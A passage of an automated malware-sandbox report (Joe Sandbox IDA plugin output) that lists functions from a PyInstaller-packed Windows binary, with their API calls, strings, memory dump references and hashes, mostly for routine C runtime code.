Instruction ID: 73bc6756ef7c27ec5330407b9903e627d3d9bd1b69bee4bc2630bc8756dff2a9
Opcode Fuzzy Hash: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
Instruction Fuzzy Hash: A741A131A18F8791EA65DB26E4142E96325FF64B64F800532FA5CC3296EF3CF509C340

Function 00007FF61E8E2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF61E8E351A,?,00000000,00007FF61E8E3F23), ref: 00007FF61E8E2AA0

Strings

Warning, xrefs: 00007FF61E8E2B1E
WARNING, xrefs: 00007FF61E8E2AAF
[PYI-%d:%s] , xrefs: 00007FF61E8E2AA8
0, xrefs: 00007FF61E8E2B16
Warning [ANSI Fallback], xrefs: 00007FF61E8E2B0F

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 0abfa030d19f1f25910c9b757e98cacb4a86df403be52b05998d9df7bfd2d12f
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 4921A332A18F8142E7609B55B4417EA6394FB98B90F400136FE8DD3659DF3CE1458740

Function 00007FF61E8FB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF61E8FB15F
FlsGetValue.KERNEL32 ref: 00007FF61E8FB174
FlsSetValue.KERNEL32 ref: 00007FF61E8FB195
FlsSetValue.KERNEL32 ref: 00007FF61E8FB1C2
FlsSetValue.KERNEL32 ref: 00007FF61E8FB1D3
FlsSetValue.KERNEL32 ref: 00007FF61E8FB1E4
SetLastError.KERNEL32 ref: 00007FF61E8FB1FF

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction ID: 4ffdb047ee545bc983998c7da88c51a8652686db8caac3fa8cc522279c9d6012
Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction Fuzzy Hash: 17213E20F0CE4281FAE8A7659A5517962565FA4FB0F144A34F93EC7AC6EE2CF8808341

Function 00007FF61E907D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF61E907D9D
GetLastError.KERNEL32 ref: 00007FF61E907DA9
CloseHandle.KERNEL32 ref: 00007FF61E907DC1
CreateFileW.KERNEL32 ref: 00007FF61E907DEC
WriteConsoleW.KERNEL32 ref: 00007FF61E907E0B

Strings

CONOUT$, xrefs: 00007FF61E907DCD

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: 18a4f83a0f1adfcb3a149df2d7f1e7ad85fe4b95f87a7e52db1f88b8beed7357
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 72118131A18E4186E7609B56E85432962B8FBA8FF4F400A34FA5EC77A5DF3CE8148740

Function 00007FF61E8E8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E8EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E8F5A

Part of subcall function 00007FF61E8E9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF61E8E45F4,00000000,00007FF61E8E1985), ref: 00007FF61E8E93C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E8FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E9044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E9055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E906A

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction ID: 0ea5a994fb0d71004f1797bf37c271c802fba3dbbfa10c2acd8ea9ce74055a1e
Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction Fuzzy Hash: 96418462A19E8281EAB09B13A5402BA7394FBA5FE4F494135EF5D97789DE7CF500C700

Function 00007FF61E8FB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB2D7
FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB30D
FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB33A
FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB34B
FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB35C
SetLastError.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB377

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction ID: 5d0764f6d5f58c9533ce8d0120df1cf4781c624e6aa7ecf6a259c5d1a7bf7799
Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction Fuzzy Hash: B4115C20F4CE4282FA98A761965517D62969FA4FB0F144734F83FC76E6EE2CF8414301

Function 00007FF61E8E2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF61E8E1B6A), ref: 00007FF61E8E295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF61E8E2966
Error [ANSI Fallback], xrefs: 00007FF61E8E29FF
Error, xrefs: 00007FF61E8E2A0E
%s: %s, xrefs: 00007FF61E8E29E8

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: a331a67b6eeb87f67c1836f3448b901d75944cb3dd39e68ca235e08e8baf75e4
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 9731D873B18E8156E7509B66A8416EA6295BF94FE4F400532FE8DC3755EF3CE5468300

Function 00007FF61E8E2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF61E8E23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF61E8E248E
DeleteObject.GDI32 ref: 00007FF61E8E24C1
DestroyIcon.USER32 ref: 00007FF61E8E24D3

Strings

Unhandled exception in script, xrefs: 00007FF61E8E23F8

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction ID: 7414f0aa635979c52f76639699c76c41cb7d4b7dd9e8673a55fa589328384dd8
Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction Fuzzy Hash: 56316272619E8189EB60DF61E8552F96364FF98BA4F440135FA4EC7B4ADF3CE1048700

Function 00007FF61E8E2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF61E8E918F,?,00007FF61E8E3C55), ref: 00007FF61E8E2BA0
MessageBoxW.USER32 ref: 00007FF61E8E2C2A

Strings

Warning, xrefs: 00007FF61E8E2C1D
[PYI-%d:%ls] , xrefs: 00007FF61E8E2BA8
WARNING, xrefs: 00007FF61E8E2BAF

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: d8d7fc6eca6d992851edba79f80808bfb913e4e5219934dba81a3b5772477c46
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: B3219F72B08F4182E7509B55B8447EA73A4EB98B90F800136FA8D9775AEF3CE605C740

Function 00007FF61E8E2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF61E8E1B99), ref: 00007FF61E8E2760

Strings

Error [ANSI Fallback], xrefs: 00007FF61E8E27CF
[PYI-%d:%s] , xrefs: 00007FF61E8E2768
Error, xrefs: 00007FF61E8E27DE
ERROR, xrefs: 00007FF61E8E276F

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 948a595864ca67171133e41aecad7b99f77568016e85ec958921d44405bd7c2a
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: D221B272B18F8142E760DB51B8817EAA394FB98BA0F800135FE8DC3659EF7CE1458740

Function 00007FF61E8F9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF61E8F9AAD
GetProcAddress.KERNEL32 ref: 00007FF61E8F9AC3
FreeLibrary.KERNEL32 ref: 00007FF61E8F9AEA

Strings

mscoree.dll, xrefs: 00007FF61E8F9AA4
CorExitProcess, xrefs: 00007FF61E8F9ABC

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: e8379ccd92f6d26a6c832f64be98024833bb11c0c4e70873075963f0e7428445
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 9BF0AF61A09F0681EB149B64A49433A2324AF64FB0F980635EA6EC62E5EF2CF044C300

Function 00007FF61E909368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF61E909390
_set_statfp.LIBCMT ref: 00007FF61E9093AB
_set_statfp.LIBCMT ref: 00007FF61E9093C7
_set_statfp.LIBCMT ref: 00007FF61E909403

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: c8fac2aa13aca62cd450a4bd1f83b8c49bb2d0064afcce14ef99269b4fee11c6
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: E3116032E5CE0659FA6411ADE4A13791058AFFAB70E8C0E34FE6ED66D78E6CF8414500

Function 00007FF61E8FB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB3AF
FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB3CE
FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB3F6
FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB407
FlsSetValue.KERNEL32(?,?,?,00007FF61E8FA5A3,?,?,00000000,00007FF61E8FA83E,?,?,?,?,?,00007FF61E8FA7CA), ref: 00007FF61E8FB418

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction ID: 6f4df90a65aea1c870ac01b977b24a638896698e15bfa1707637a0e7e1eb101c
Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction Fuzzy Hash: 56116020F0CE4281FAD8A765A65127961915FB4FB0F488734F93EC6AD6DE2CF8428341

Function 00007FF61E8FB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF61E8FB235
FlsSetValue.KERNEL32 ref: 00007FF61E8FB254
FlsSetValue.KERNEL32 ref: 00007FF61E8FB27C
FlsSetValue.KERNEL32 ref: 00007FF61E8FB28D
FlsSetValue.KERNEL32 ref: 00007FF61E8FB29E

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction ID: 35dfe4d51630ba208ba32a1e9a29eb9a49c258376a61ddb521e2fec2bd482687
Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction Fuzzy Hash: 3B110920E09E0785F9E8A3A144511BE21565FB5F70F188B34F93ECA6D3EE3CF8414251

Function 00007FF61E8F5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F5FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F6106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F61BC

Strings

verbose, xrefs: 00007FF61E8F5FB0

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: a16c93308cf77f055ffa215b9e8b78f4a15258afaba92f8b297bd24e887fdc01
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 9791CF32A08E4685F7A18E34D45037E36A5AB60FA8F544336EA5DC33D6DE3DF845A390

Function 00007FF61E8FFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8FFEA7

Part of subcall function 00007FF61E8F7A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F7A59

Strings

UTF-8, xrefs: 00007FF61E8FFE26
ccs, xrefs: 00007FF61E8FFDE2
UTF-16LEUNICODE, xrefs: 00007FF61E8FFE45

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 6b26bf7c63baf9c4073363511f0c526d99fb4afe9a922121677999c07f769950
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: AA81B072E08E5285F7F6AF29811027836A0AB31FA8F554131FA09D7285DF2DF881D381

Function 00007FF61E8ED648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF61E8ED673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF61E8ED70A
RtlUnwindEx.KERNEL32 ref: 00007FF61E8ED764

Strings

csm, xrefs: 00007FF61E8ED6F1

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
